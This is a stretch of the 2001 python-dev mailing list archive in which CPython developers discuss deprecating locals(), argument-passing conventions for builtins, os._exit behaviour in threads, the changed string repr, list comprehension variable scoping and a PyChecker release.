PythonLabs at Digital Creations From tim.one at home.com Tue May 29 01:42:05 2001 From: tim.one at home.com (Tim Peters) Date: Mon, 28 May 2001 19:42:05 -0400 Subject: [Python-Dev] Deprecating locals() (was Re: nested scopes and global: some corner cases) In-Reply-To: <15122.39401.621215.978215@cj42289-a.reston1.va.home.com> Message-ID: [Guido] > Actually, I intend to deprecate locals(). For now, globals() are > fine. I also intend to deprecate vars(), at least in the form that is > equivalent to locals(). [Fred L. Drake, Jr.] > Nothing has happened on this front yet. Should I add deprecation > notes to the documentation while Guido is on vacation, or wait to ask > him when he gets back? Or was this matter resolved when I wasn't > paying attention? I advise continuing to ignore it. Nothing was resolved, and to judge from a trial balloon I floated on c.l.py at the time, it's not a deprecation that will be greeted with enthusiasm. The problems range from people doing def f(...): ... print "..." % locals() to people mutating locals() at module level because they simply don't understand that globals() is the same (but correct) thing to use there. Due to the first example, and as Samuele may have already suggested, we at least need to implement a mapping object capturing name bindings before we can even think about deprecating locals() for real. From tim.one at home.com Tue May 29 02:01:33 2001 From: tim.one at home.com (Tim Peters) Date: Mon, 28 May 2001 20:01:33 -0400 Subject: [Python-Dev] strop vs. string In-Reply-To: <3B1214B3.9A4C295D@lemburg.com> Message-ID: [Tim] > Wait for what? If it were possible, is the chance that you'd > take time to rework unicodeobject.c to "subclass from a generic > abstract string object" greater than 0? The chance that I > would is exactly 0. [MAL] > Well, that's hard to say. It would certainly be low-priority; > same for the above refactoring.
I think you must have missed this when it first came up here: /F suggested that *he* had a non-zero chance of implementing his suggestion. That makes it far closer to reality than anything that's been suggested since . From tim.one at home.com Tue May 29 02:42:54 2001 From: tim.one at home.com (Tim Peters) Date: Mon, 28 May 2001 20:42:54 -0400 Subject: [Python-Dev] Special-casing "O" In-Reply-To: <3B121814.E5E9896A@lemburg.com> Message-ID: [MAL] > If we end up only optimizing the re.match("O+") case, we wouldn't need > the METH_SPECIAL masks; a simple METH_OBJARGS flag would do the trick > and Martin could call the underlying API with one or more PyObject* > taken directly from the Python VM stack. How then does the callee know it was called with the correct # of arguments? By adding enough pointer arguments to cover the longest possible O+ string plus 1, then verifying that the one just beyond the last one it expects is NULL, while the ones before that are not? Adding another "# of arguments" member to the method table? Inventing METH_O, METH_OO, METH_OOO, ...? > In that case, please consider at least supporting "O", "OO" and "OOO" > with optional arguments treated like I suggested in an earlier > posting (simply pass NULL and let the API take care of assigning > a default value). > > This would take care of most builtins: You don't have to convince me that cases other than plain "O" exist. What's missing is data in support of the idea that calls to those are relatively frequent enough that it's a NET win to slow plain "O" in order to speed the additional cases when they happen. For example, it's not possible for calls to reduce() to have a high hit rate in real life, because builtin_reduce is a very expensive function -- there's only so many of those you can cram into a second even if the calling overhead is 0. OTOH, add a single branch to the time it takes to find builtin_type and you've slowed its *total* execution time significantly. 
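One of the options Tim lists, an extra "# of arguments" member in the method table, combined with MAL's suggestion of passing NULL for omitted optional arguments, could look roughly like the Python sketch below. MethodDef, min_args, max_args, call_fixed_arity and builtin_pow are hypothetical names, None stands in for NULL, and the error wording is an assumption. Note that the range check and the padding step are exactly the extra per-call work Tim is worried about adding to the plain one-argument path.

```python
from typing import Any, Callable, NamedTuple


class MethodDef(NamedTuple):
    name: str
    func: Callable[..., Any]
    min_args: int  # hypothetical field: required positional arguments
    max_args: int  # hypothetical field: required + optional arguments


def call_fixed_arity(meth: MethodDef, *args: Any) -> Any:
    n = len(args)
    if not meth.min_args <= n <= meth.max_args:
        if meth.min_args == meth.max_args:
            expected = "exactly %d" % meth.min_args
        else:
            expected = "%d to %d" % (meth.min_args, meth.max_args)
        raise TypeError("%s() takes %s arguments (%d given)"
                        % (meth.name, expected, n))
    # Omitted optional arguments arrive as None (standing in for NULL);
    # the callee substitutes its own default.
    padded = args + (None,) * (meth.max_args - n)
    return meth.func(*padded)


def builtin_pow(v, w, z):
    # Callee-side default handling for the optional third argument.
    return pow(v, w) if z is None else pow(v, w, z)


POW = MethodDef("pow", builtin_pow, 2, 3)

if __name__ == "__main__":
    print(call_fixed_arity(POW, 2, 10))        # optional z omitted
    print(call_fixed_arity(POW, 2, 10, 1000))  # all three supplied
```

The design trades a per-call range check and tuple padding for not having to parse a format string; whether that beats a dedicated one-argument path is the measurement question Tim raises.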
The implementation of METH_O alone is a pure win by any measure. So would be implementing METH_OO alone, or METH_OOO alone, etc. Mix them, and they all get slower than they could have been. All the data we have says METH_O is the single most important case, and that jibes with common sense, so I believe it. If you want to speed everything, fine, do that, but that likely requires a preprocessing phase so that type signatures don't have to be resolved at runtime at all. So long as we're just looking at simple hacks, "the simpler the better" is good advice and should rule in the absence of compelling evidence against it. From tim.one at home.com Tue May 29 03:14:16 2001 From: tim.one at home.com (Tim Peters) Date: Mon, 28 May 2001 21:14:16 -0400 Subject: [Python-Dev] file.writelines("foo\n","bar\n") In-Reply-To: <200105280740.f4S7esP01223@mira.informatik.hu-berlin.de> Message-ID: [Martin v. Loewis] > ... > Because it is a METH_OLDARGS method, you can do > > f=open("/tmp/x","w") > f.writelines("foo\n","bar\n") > > With my upcoming patches, I'd replace this with METH_O, making this > call illegal. Does anybody see a problem with that change in > semantics? Guido won't, and if he had even a twinge of doubt, Thomas's explanation of how this bug was introduced in 2.0 would erase it. The list.append() docs were arguably unclear when that brouhaha hit, but there's nothing unclear about the file.writelines() docs. OTOH, the file.writelines() docs still say a list is required, not "a sequence" as the 2.0 (+ current) code actually implements. Hmm. Wonder whether writelines() should be generalized to allow an iterable object? From tim.one at home.com Tue May 29 03:49:29 2001 From: tim.one at home.com (Tim Peters) Date: Mon, 28 May 2001 21:49:29 -0400 Subject: [Python-Dev] Killing threads In-Reply-To: <20010524045938.5228199C83@waltz.rahul.net> Message-ID: [Aahz] > (This got brought up because I experimented with os._exit() as a > possible solution, but that GPFs on Win98SE.) 
[Tim] > Please open a bug report on that, then, with a tiny test case > if possible. > This worked fine on Win98SE for me just now: [Aahz] > Futz. *Now* it works. Now *what* works? The test case I posted, or the original test case you tried (which you didn't post)? > Chalk it up to another unreproducible bug caused by an unstable Win98. Actually doubt it -- threads are very reliable on Win98, despite that little else is (malloc() is flaky, popen() is a nightmare, etc). Here's a recent bug report on a Red Hot box that may be related: http://sf.net/tracker/?group_id=5470&atid=105470&func=detail&aid=426735 I have no idea what's supposed to happen if you call os._exit from a *spawned* thread (perhaps that's what you did too? I did not) -- threads are outside the scope of the C std, so I suppose it's a x-platform crapshoot. From greg at cosc.canterbury.ac.nz Tue May 29 04:12:55 2001 From: greg at cosc.canterbury.ac.nz (Greg Ewing) Date: Tue, 29 May 2001 14:12:55 +1200 (NZST) Subject: [Python-Dev] file.writelines("foo\n","bar\n") In-Reply-To: <200105280740.f4S7esP01223@mira.informatik.hu-berlin.de> Message-ID: <200105290212.OAA01138@s454.cosc.canterbury.ac.nz> "Martin v. Loewis" > I took a special look at METH_OLDARGS occurrences. Shouldn't all these be removed? I would have thought list.append was the last one! Greg Ewing, Computer Science Dept, +--------------------------------------+ University of Canterbury, | A citizen of NewZealandCorp, a | Christchurch, New Zealand | wholly-owned subsidiary of USA Inc.
| greg at cosc.canterbury.ac.nz +--------------------------------------+ From greg at cosc.canterbury.ac.nz Tue May 29 04:33:58 2001 From: greg at cosc.canterbury.ac.nz (Greg Ewing) Date: Tue, 29 May 2001 14:33:58 +1200 (NZST) Subject: [Python-Dev] Deprecating locals() (was Re: nested scopes and global: some corner cases) In-Reply-To: <15122.39401.621215.978215@cj42289-a.reston1.va.home.com> Message-ID: <200105290233.OAA01143@s454.cosc.canterbury.ac.nz> Samuele Pedroni writes: > I imagine a (new) function that produce a snap-shot of the values in the > local,free and cell vars of a scope can do the job required for simple > debugging I think there should be methods operating directly on stack frames for debuggers to use. Greg Ewing, Computer Science Dept, +--------------------------------------+ University of Canterbury, | A citizen of NewZealandCorp, a | Christchurch, New Zealand | wholly-owned subsidiary of USA Inc. | greg at cosc.canterbury.ac.nz +--------------------------------------+ From jepler at mail.inetnebr.com Tue May 29 04:32:05 2001 From: jepler at mail.inetnebr.com (Jeff Epler) Date: Mon, 28 May 2001 21:32:05 -0500 Subject: [Python-Dev] Killing threads In-Reply-To: ; from tim.one@home.com on Mon, May 28, 2001 at 09:49:29PM -0400 References: <20010524045938.5228199C83@waltz.rahul.net> Message-ID: <20010528213205.A1236@localhost.localdomain> On Mon, May 28, 2001 at 09:49:29PM -0400, Tim Peters wrote: > Here's a recent bug report on a Red Hot box that may be related: > > http://sf.net/tracker/?group_id=5470&atid=105470&func=detail&aid=426735 > > I have no idea what's supposed to happen if you call os._exit from a > *spawned* thread (perhaps that's what you did too? I did not) -- threads > are outside the scope of the C std, so I suppose it's a x-platform > crapshoot. I wrote that program after the first go-round about _exit and threads, and when I got behavior I didn't expect, I entered it in the SF bug tracker. 
My reasoning: The documentation for _exit() says it is "used to exit the child process after a fork()", and my model for thinking about threads is that they're "child processes, but ...". Thus, invoking os._exit() in a thread made sense to me, meaning "ask the OS to destroy this thread now, but leave my file descriptors, etc., alone for the other threads."

Your suggestion in the tracker of writing the equivalent C program is a good one, though my suspicion (which I did not voice in the SF report) was that perhaps the thread which called _exit() held the GIL, in which case it was in some sense Python's fault that execution didn't continue. In any case, I don't have the faintest idea how to program threads in C/pthreads, so I can't write the "equivalent C program".

In fact, a traceback from the hung "sleep(1)" thread shows

    (gdb) where
    #0  0x4008c656 in __sigsuspend (set=0xbffff5b0)
        at ../sysdeps/unix/sysv/linux/sigsuspend.c:45
    #1  0x4002ee39 in __pthread_wait_for_restart_signal (self=0x400387c0)
        at pthread.c:934
    #2  0x4002b05c in pthread_cond_wait (cond=0x80cf5cc, mutex=0x80cf5d8)
        at restart.h:34
    #3  0x08067ba0 in PyThread_acquire_lock () at eval.c:41
    #4  0x08051ff1 in PyEval_RestoreThread () at eval.c:41
    #5  0x40019ef9 in floatsleep () at eval.c:41
    #6  0x400193fd in time_sleep () at eval.c:41
    [...]

While those line numbers look a little fishy (eval.c:41 for all three frames?), I think this might support my supposition.

Of course, if os._exit() has no intended use in a threaded program, then this behavior is as good as any.
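For comparison, ending only the calling thread (the effect described above) does not require os._exit(). A minimal sketch in modern Python 3, assuming the old `thread` module under its current name `_thread`; the `worker` function and `results` list are illustrative only. `_thread.exit()` raises SystemExit, which the threading machinery swallows silently, so only the worker stops while the main thread carries on:

```python
import threading
import _thread  # Python 3 name of the 2.x `thread` module

results = []

def worker():
    results.append("started")
    # Raises SystemExit: ends only this thread, with normal cleanup.
    # os._exit() would instead end the whole process with no cleanup.
    _thread.exit()
    results.append("unreachable")  # never runs

t = threading.Thread(target=worker)
t.start()
t.join()
results.append("main thread still running")
print(results)  # ['started', 'main thread still running']
```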
Jeff

From tim.one at home.com Tue May 29 06:03:38 2001
From: tim.one at home.com (Tim Peters)
Date: Tue, 29 May 2001 00:03:38 -0400
Subject: [Python-Dev] Killing threads
In-Reply-To: <20010528213205.A1236@localhost.localdomain>
Message-ID:

[Jeff Epler, on http://sf.net/tracker/?group_id=5470&atid=105470&func=detail&aid=426735 ]
> My reasoning: The documentation for _exit() says it is "used to exit the
> child process after a fork()", and my model for thinking about threads
> is that they're "child processes, but ...". Thus, invoking os._exit()
> in a thread made sense to me, meaning "ask the OS to destroy this thread
> now, but leave my file descriptors, etc., alone for the other threads."

You need a Linux expert to address this. Threads and processes are different beasts under most flavors of Unix, but Linux confuses them; I've no idea how _exit() is supposed to work there, and that's why I asked (in the bug report) what the Linux docs say about that (_exit() is supplied by your local C library; Python just wraps it). If what you really wanted was just to abort the thread, use thread.exit() (see the thread docs). os._exit() is a dangerous thing even in the best of conditions; unsure why the Python docs suggest using it.

> Your suggestion in the tracker of writing the equivalent C program is a
> good one, though my suspicion (which I did not voice in the SF report)
> was that perhaps the thread which called _exit() held the GIL, in which
> case it was in some sense Python's fault that execution didn't continue.

Ah, makes sense! Yes, I bet that's what's happening. If so, there's nothing Python can do about it: I'm afraid you did it to yourself. _exit() specifically asks that no cleanup processing be done, and when Python calls it Python never regains control. If you had done an actual fork, fine, the *process* doing the _exit() would never come back to Python, but the GIL in that process has nothing to do with the GIL in the parent process.
But threads share the same GIL, and if you _exit() from a thread holding the GIL then no other thread can ever run again. Looks like it's also platform-dependent: on Windows, _exit() kills the process and every thread ever spawned by that process. Since C doesn't say anything about threads, that can't be called right or wrong. Looks like on Linux _exit() only kills the thread that calls it.

> ...
> Of course, if os._exit() has no intended use in a threaded program,

Right, it wasn't -- unless your program panics and wants to get out ASAP no matter what the consequences.

> then this behavior is as good as any.

And better than most .

From tim.one at home.com Tue May 29 06:16:46 2001
From: tim.one at home.com (Tim Peters)
Date: Tue, 29 May 2001 00:16:46 -0400
Subject: [Python-Dev] file.writelines("foo\n","bar\n")
In-Reply-To: <200105290212.OAA01138@s454.cosc.canterbury.ac.nz>
Message-ID:

[Martin]
> I took a special look at METH_OLDARGS occurrences.

[GregE]
> Shouldn't all these be removed? I would have thought
> list.append was the last one!

I count 42 of them remaining, usually for 0-argument functions. METH_OLDARGS is faster than METH_VARARGS in that case, and the callee can distinguish between "called with nothing" and "called with something" under OLDARGS. However, they don't appear to catch keyword args:

>>> {}.clear(2) # complains
Traceback (most recent call last):
  File "<stdin>", line 1, in ?
TypeError: function takes no arguments
>>> {}.clear(val=12, hohoho=666) # accepts nonsense silently
>>>

the-more-you-look-the-messier-it-gets-ly y'rs - tim

From tim.one at home.com Tue May 29 08:06:19 2001
From: tim.one at home.com (Tim Peters)
Date: Tue, 29 May 2001 02:06:19 -0400
Subject: [Python-Dev] Python 2.1.1
In-Reply-To: <15116.31871.122265.883855@anthem.wooz.org>
Message-ID:

ESR> Apparently the Universe is an even more random place than I
ESR> thought.

[Barry A.
Warsaw] > here's-where-the-timbot-explains-that-it's-only-pseudo-random-ly y'rs, That's what Einstein believed (i.e., that it isn't truly random). Unfortunately, according to another recent thread, Einstein was afraid to use equations because he didn't want to cut Stephen Hawking's editor's penis in half -- or something like that. Whichever, consensus still holds that Einstein lost this one. i'd-take-time-to-prove-him-right-but-there's-some-mangled-whitespace- crying-for-help-ly y'rs - tim From tim.one at home.com Tue May 29 08:15:07 2001 From: tim.one at home.com (Tim Peters) Date: Tue, 29 May 2001 02:15:07 -0400 Subject: [Python-Dev] RE: What happened to Idle's extend.py? In-Reply-To: Message-ID: Guido's on vacation. Anyone have an answer for this? I don't, and can't make time to dig into now. If you can, David's address showed up as mailto:boogiemorg at aol.com > -----Original Message----- > From: python-list-admin at python.org > [mailto:python-list-admin at python.org]On Behalf Of David Morgenthaler > Sent: Wednesday, May 23, 2001 6:20 PM > To: python-list at python.org > Subject: What happened to Idle's extend.py? > > > Idle-0.3, shipped with Python 1.5.2 had an extend.py module that was > used to extend Idle. We've used this extensively, building entire > "applications" as Idle extensions. > > Now that we're moving to Python 2.1, we find the same old directions > for extending Idle (in extend.txt), but there appears to be no > extend.py in Idle-0.8. > > Does anyone know how we can add extensions to Idle-0.8? > > Thanks in advance, > David > -- > http://mail.python.org/mailman/listinfo/python-list From mwh at python.net Tue May 29 10:00:42 2001 From: mwh at python.net (Michael Hudson) Date: Tue, 29 May 2001 09:00:42 +0100 (BST) Subject: [Python-Dev] file.writelines("foo\n","bar\n") In-Reply-To: Message-ID: On Tue, 29 May 2001, Tim Peters wrote: > [Martin] > > I took a special look at METH_OLDARGS occurrences. > > [GregE] > > Shouldn't all these be removed? 
I would have thought > > list.append was the last one! > > I count 42 of them remaining, usually for 0-argument functions. There are more than that; PyMethodDefs that don't put anything in that slot in the source are METH_OLDARGS too, and there are quite a few of them in Modules/ (there are *lots* in _cursesmodule.c, but also in many of the older modules - gl, rotor were easy to find). There are also quite a lot of functions that put literal zeros there, too. So METH_OLDARGS is far from dead, sadly. Cheers, M. From tim.one at home.com Tue May 29 10:04:48 2001 From: tim.one at home.com (Tim Peters) Date: Tue, 29 May 2001 04:04:48 -0400 Subject: [Python-Dev] Comparison speed In-Reply-To: <200105211703.f4LH3xD01154@mira.informatik.hu-berlin.de> Message-ID: [from Monday, May 21, 2001 1:04 PM] [Tim] >> Unfortunately, it's 4 calls, as PyErr_Occurred() isn't a leaf. [Martin v. Loewis] > Any reason why PyThreadState_GET isn't used there? Perhaps somebody's shift key got jammed? sure-don't-see-a-good-reason-ly y'rs - tim From thomas at xs4all.net Tue May 29 11:52:01 2001 From: thomas at xs4all.net (Thomas Wouters) Date: Tue, 29 May 2001 11:52:01 +0200 Subject: [Python-Dev] Re: string repr in 2.1 (fwd) Message-ID: <20010529115201.J676@xs4all.nl> Robin apparently ran into a real problem caused by the change in string repr() semantics. Now, arguably this is his own stupid fault (and indeed he argues that himself) but that doesn't mean we shouldn't take this into account. We could, for instance, revert 2.1.1 to the old behaviour, giving at least *someone* a reason to switch to 2.1.1 ;) Or we could decide what the string repr() change really wanted was just for the REPL to print it like this, in which case the displayhook should fix it, not string_repr. Opinions ? 
Ping, IIRC, this was your proposal, so yours would be especially valuable ;) ----- Forwarded message from Robin Becker ----- Date: Tue, 29 May 2001 09:58:49 +0100 From: Robin Becker To: Thomas Wouters Cc: python-list at python.org Subject: Re: string repr in 2.1 In message <20010529102414.P690 at xs4all.nl>, Thomas Wouters writes >On Tue, May 29, 2001 at 12:47:39AM +0100, Robin Becker wrote: >> In article , Remco Gerlich >> writes > >> >Since 2.1, string repr uses heximal escapes instead of octal ones. > >> yes I guess all those *nix tools that like octal should be whipped and >> made to obey the malevolent dictator. > >Do you have tools you use to parse quoted (repr'd) Python strings that >handle octal correctly, but don't handle \x and \n\r escape codes ? Which >ones ? And were you aware that they were going to break sooner or later, >just because someone can prefer 'readable' escape codes and feed it that >instead ? :) > Yes I have such tools. One is called Acrobat Reader, another is traditional sed and awk. My dos grep doesn't seem to like hex, I suppose I must update it and all other tools. My C compiler understands octal and the newer ones do hex as well. I can read octal and do arithmetic in it probably easier than hex. I don't defend the octal representation it's just very widespread in the older tools. Our usage of repr was probably stupid as clearly repr can change. How I long for my 18-bit PDP-15 :) what happened to my 15 octal digit cdc! Oh woe is me! Where are the duo-decimal calculators of yore? -- Robin Becker ----- End forwarded message ----- -- Thomas Wouters Hi! I'm a .signature virus! copy me into your .signature file to help me spread! 
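If a downstream tool (sed, awk, an old grep) only understands octal escapes, one option is to generate them explicitly instead of relying on repr(), whose escape format changed between 2.0 and 2.1. A minimal sketch in Python 3; the helper name `octal_escape` is hypothetical, it is not the 2.0 repr() code, and it leaves quote characters unescaped:

```python
def octal_escape(data: bytes) -> str:
    """Escape every byte outside printable ASCII as a 3-digit octal
    sequence (the pre-2.1 repr() style); backslashes are doubled."""
    out = []
    for b in data:
        if b == 0x5C:               # a literal backslash must be escaped too
            out.append("\\\\")
        elif 0x20 <= b < 0x7F:      # printable ASCII passes through unchanged
            out.append(chr(b))
        else:                       # everything else, including \n, becomes \ooo
            out.append("\\%03o" % b)
    return "".join(out)

print(octal_escape(b"a\x00\xffb\n"))  # a\000\377b\012
```

For contrast, Python 3's `repr(b"\x00\xff")` produces `b'\x00\xff'`, using hex escapes.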
From akuchlin at mems-exchange.org Tue May 29 16:04:37 2001 From: akuchlin at mems-exchange.org (Andrew Kuchling) Date: Tue, 29 May 2001 10:04:37 -0400 Subject: [Python-Dev] Removing doc/howto on python.org In-Reply-To: <15122.38609.553115.107831@cj42289-a.reston1.va.home.com>; from fdrake@acm.org on Mon, May 28, 2001 at 02:20:01PM -0400 References: <15122.38609.553115.107831@cj42289-a.reston1.va.home.com> Message-ID: <20010529100437.A15638@ute.cnri.reston.va.us> On Mon, May 28, 2001 at 02:20:01PM -0400, Fred L. Drake, Jr. wrote: > It looks like I never replied to this. It's probably dropped off >your radar, but I'd say the answer is that the files on parrot should >be discarded sooner rather than later -- when we actually manage to Done. Out of paranoia about doing 'rm -rf' within www.python.org's tree, the files aren't deleted; instead I just moved them to my home directory on parrot. --amk From aahz at rahul.net Tue May 29 17:47:13 2001 From: aahz at rahul.net (Aahz Maruch) Date: Tue, 29 May 2001 08:47:13 -0700 (PDT) Subject: [Python-Dev] Killing threads In-Reply-To: from "Tim Peters" at May 28, 2001 09:49:29 PM Message-ID: <20010529154713.11F8E99C80@waltz.rahul.net> Tim Peters wrote: > > [Aahz] > > Futz. *Now* it works. > > Now *what* works? The test case I posted, or the original test case you > tried (which you didn't post)? My original test case. I didn't actually preserve it, so the code below was my attempt to reconstruct it (but I think it's pretty close to the test case I tried). Don't worry, if I run into this again, I'll be *much* more careful about preserving the evidence and fiddling with variations; last time I just assumed it was pilot error. 
    from threading import Thread
    import os

    class Foo(Thread):
        def run(self):
            while 1:
                pass

    f = Foo()
    f.start()
    os._exit(1)

From beazley at cs.uchicago.edu Tue May 29 18:56:09 2001
From: beazley at cs.uchicago.edu (David Beazley)
Date: Tue, 29 May 2001 11:56:09 -0500 (CDT)
Subject: [Python-Dev] Iteration variables and list comprehensions
Message-ID: <15123.54441.925351.439879@gargoyle.cs.uchicago.edu>

I'm not sure if this has ever been brought up before (I don't recall seeing it), but I would like to throw out something that has been bugging me about list comprehensions for quite some time...

First of all, I have to say that I've really grown to like list comprehensions a lot. In fact, I find myself using them in just about every Python program I've been writing since switching to Python 2.0. However, I've also been shooting myself in the foot a little more than usual due to the following issue:

When I write a list comprehension like this:

    s = [ expr(x) for x in t ]

it is *VERY* easy to overlook the fact that the iteration variable "x" is evaluated in the local scope (and replaces any previous binding to "x" that might have existed outside the context of the list comprehension). Because of this, I have frequently found myself debugging the following programming error:

    # Some loop
    for x in r:
        ...
        # bunch of statements
        ...
        s = [expr(x) for x in t]
        ...
        # Try to do something with x.
        # ???? What in the hell is wrong with my program ????
        ...

The main problem is that I conceptually tend to think of the list comprehension as being some kind of list operator where the index name is really one of the operands in some sense. Because of this, it is *VERY* easy to get in the habit of throwing list comprehensions all over the place, each of which uses a common index name like x,i,j, etc. Of course, this works just fine until you forget that you're also using x,i,j for some kind of loop variable someplace else :-).
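The pitfall described above can still be reproduced in current Python by writing out by hand the nested-loop expansion that a 2.x list comprehension stood for. A minimal sketch; `process`, `rows`, and `items` are illustrative names only:

```python
def process(rows, items):
    seen = []
    for x in rows:                  # outer loop variable
        # Hand-written 2.x expansion of [x * 2 for x in items]:
        # a plain for loop that binds x in the *same* scope.
        doubled = []
        for x in items:
            doubled.append(x * 2)
        seen.append(x)              # x is now the last item, not the current row
    return seen

print(process(["a", "b"], [1, 2, 3]))  # [3, 3], not ['a', 'b']
```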
Therefore, I'm wondering if it would make any sense to make the iterator variables used inside of a list comprehension private in some manner--either through name mangling or some other technique? For example:

    s = [expr(x) for x in t]

would get expanded into something roughly like this:

    s = [ ]
    for _mangled_x in t:
        s.append(expr(_mangled_x))
    del _mangled_x

Just as an aside, I have never intentionally used the iterator variable of a list comprehension after the operation has completed. I was actually quite surprised with this behavior the first time I saw it. I suspect most other programmers would not anticipate this side effect either.

Comments?

Cheers,

Dave

From nas at python.ca Tue May 29 19:01:41 2001
From: nas at python.ca (Neil Schemenauer)
Date: Tue, 29 May 2001 10:01:41 -0700
Subject: [Python-Dev] Iteration variables and list comprehensions
In-Reply-To: <15123.54441.925351.439879@gargoyle.cs.uchicago.edu>; from beazley@cs.uchicago.edu on Tue, May 29, 2001 at 11:56:09AM -0500
References: <15123.54441.925351.439879@gargoyle.cs.uchicago.edu>
Message-ID: <20010529100141.B18974@glacier.fnational.com>

David Beazley wrote:
> Just as an aside, I have never intentionally used the iterator
> variable of a list comprehension after the operation has completed.

I've been bitten by this one once. It took a while to figure out the problem. I'm not sure that we can change it now though.

Neil

From skip at pobox.com Tue May 29 21:03:47 2001
From: skip at pobox.com (Skip Montanaro)
Date: Tue, 29 May 2001 14:03:47 -0500
Subject: [Python-Dev] [Stackless] Stackless for 2.1: Progress Report (fwd)
Message-ID: <15123.62099.473259.545781@beluga.mojam.com>

I pass this along in case anyone here has some ideas for Jeff about how to work around his problems with pyexpat.c.

Skip
-------------- next part --------------
An embedded message was scrubbed...
From: Jeff Rush Subject: [Stackless] Stackless for 2.1: Progress Report Date: Tue, 29 May 2001 13:06:12 -0500 Size: 3437 URL: From gward at python.net Tue May 29 23:21:55 2001 From: gward at python.net (Greg Ward) Date: Tue, 29 May 2001 17:21:55 -0400 Subject: [Python-Dev] Iteration variables and list comprehensions In-Reply-To: <15123.54441.925351.439879@gargoyle.cs.uchicago.edu>; from beazley@cs.uchicago.edu on Tue, May 29, 2001 at 11:56:09AM -0500 References: <15123.54441.925351.439879@gargoyle.cs.uchicago.edu> Message-ID: <20010529172155.A8737@gerg.ca> On 29 May 2001, David Beazley said: > Therefore, I'm wondering if it would make any sense to make the > iterator variables used inside of a list comprehension private in some > manner--either through name mangling or some other technique? For > example: Two ideas occur to me: * make the list comprehension a new scoping level, which of course is doable now that we have sensible scoping semantics. Presumably the usual warning message about shadowing variables from an outer scope will apply; you'll still have the bug in your code, but at least Python will tell you about it * don't make list comprehensions a separate scope, but add a little trickery so that something *like* the "shadowing variable from an outer scope" message is emitted Haven't really thought about backwards compatibility issues... Greg From paulp at ActiveState.com Tue May 29 23:55:03 2001 From: paulp at ActiveState.com (Paul Prescod) Date: Tue, 29 May 2001 14:55:03 -0700 Subject: [Python-Dev] Re: string repr in 2.1 (fwd) References: <20010529115201.J676@xs4all.nl> Message-ID: <3B141AB7.4C6DAFB6@ActiveState.com> Thomas Wouters wrote: > > Robin apparently ran into a real problem caused by the change in string > repr() semantics. Now, arguably this is his own stupid fault (and > indeed he argues that himself) but that doesn't mean we shouldn't take this > into account. I think it is done now and it is better this way. The pain is over. 
Reverting would hurt someone else again. Displayhook should be used sparingly. One of the major virtues of the REPL is that it behaves so much like standard Python. -- Take a recipe. Leave a recipe. Python Cookbook! http://www.ActiveState.com/pythoncookbook From tim at digicool.com Wed May 30 00:54:01 2001 From: tim at digicool.com (Tim Peters) Date: Tue, 29 May 2001 18:54:01 -0400 Subject: [Python-Dev] Re: Time for the yearly list.append() panic Message-ID: FYI, I checked in a variation (listobject.c) over the weekend. Win9x is ultimately hopeless, but we can grow a list there to about 35M elements now instead of crapping out at < 2M, and it's zippy the whole way until death. Win2K (and I *assume* WinNT) benefit much more, as non-linear behavior was obvious very early there. Now it's flat and fast until physical RAM is exhausted, and then it suffers looong (15-30 seconds) "hiccups" at resize points. Fred kindly confirmed that Linux isn't hurt. Its behavior looks the same as the new Win2K behavior, except that the Linux hiccups are much briefer (although still obvious when they occur). time-for-the-yearly-list.append()-celebration-ly y'rs - tim From neal at metaslash.com Wed May 30 04:49:45 2001 From: neal at metaslash.com (Neal Norwitz) Date: Tue, 29 May 2001 22:49:45 -0400 Subject: [Python-Dev] PyChecker v0.5 released Message-ID: <3B145FC9.49813488@metaslash.com> I was finally able to get version 0.5 out. Just in case this is the first time you are seeing this message, or you forgot what PyChecker is: PyChecker is a tool for finding common bugs in python source code. It finds problems that are typically caught by a compiler for less dynamic languages, like C and C++. Because of the dynamic nature of python, some warnings may be incorrect; however, spurious warnings should be fairly infrequent. The highlights are that code at the module scope is now checked. There is still a problem with class variables and globals that are default parameter values. 
But other than that, there should be no more spurious Variable unused warnings. Code that makes PyChecker raise an exception should now be caught in most cases and this produces a warning. Please mail me if you find it blowing up on your code. The last line processed is shown in the warning, so if you include some context, I can hopefully fix the problem. Also, PyChecker should really use the files passed on the command line, even if it uses the same module name internally. So it will check your warn.py, not PyChecker's warn.py. Feedback, comments, criticisms, new ideas, better ideas, etc. are all greatly appreciated. Thanks for everyone who has taken the time to mail me. If you can think of common mistakes that are made that PyChecker doesn't find, please let me know. Here's the CHANGELOG: * Catch internal errors "gracefully" and turn into a warning * Add checking of most module scoped code * Add pychecker subdir to imports to prevent filename conflicts * Don't produce unused local variable warning if variable name == '_' * Add -g/--allglobals option to report all global warnings, not just first * Add -V/--varlist option to selectively ignore variable not used warnings * Add test script and expected results * Print all instructions when using debug (-d/--debug) * Overhaul internal stack handling so we can look for more problems * Fix glob'ing problems (all args after glob were ignored) * Fix spurious Base class __init__ not called * Fix exception on code like: ['xxx'].index('xxx') * Fix exception on code like: func(kw=(a < b)) * Fix line numbers for import statements PyChecker is available on Source Forge: Web page: http://pychecker.sourceforge.net/ Project page: http://sourceforge.net/projects/pychecker/ Neal -- pychecker at metaslash.com From fdrake at cj42289-a.reston1.va.home.com Wed May 30 07:31:01 2001 From: fdrake at cj42289-a.reston1.va.home.com (Fred Drake) Date: Wed, 30 May 2001 01:31:01 -0400 (EDT) Subject: [Python-Dev] [development doc updates] 
Message-ID: <20010530053101.4985F28A10@cj42289-a.reston1.va.home.com>

The development version of the documentation has been updated:

    http://python.sourceforge.net/devel-docs/

Incremental update for development version of Python (2.2).

Mostly small updates, but I've worked on new markup for grammar productions used in the Reference Manual. Currently, only the lexical productions in Chapter 2 of the manual have been converted to the new markup and layout. Please take a look and send comments to doc-sig at python.org; the first page containing these changes is at:

    http://python.sourceforge.net/devel-docs/ref/identifiers.html

The changes needed to implement the markup have not been checked in yet, and there are some bugs in the implementation (both for HTML and PDF), but this should make the productions easier to navigate.

I've tested the HTML version on Linux only with Mozilla 0.9, Opera 5.0b8, and Netscape Navigator 4.77. Navigator is definitely lagging behind in CSS support!

Also added Michel Pelletier's documentation for the HTMLParser module, with some small changes.

From tim.one at home.com Wed May 30 07:51:04 2001
From: tim.one at home.com (Tim Peters)
Date: Wed, 30 May 2001 01:51:04 -0400
Subject: [Python-Dev] RE: [Doc-SIG] [development doc updates]
In-Reply-To: <20010530053101.4985F28A10@cj42289-a.reston1.va.home.com>
Message-ID:

[Fred Drake]
> The development version of the documentation has been updated:
>
> http://python.sourceforge.net/devel-docs/
>
> Incremental update for development version of Python (2.2).
>
> Mostly small updates, but I've worked on new markup for grammar
> productions used in the Reference Manual. Currently, only the lexical
> productions in Chapter 2 of the manual have been converted to the new
> markup and layout.
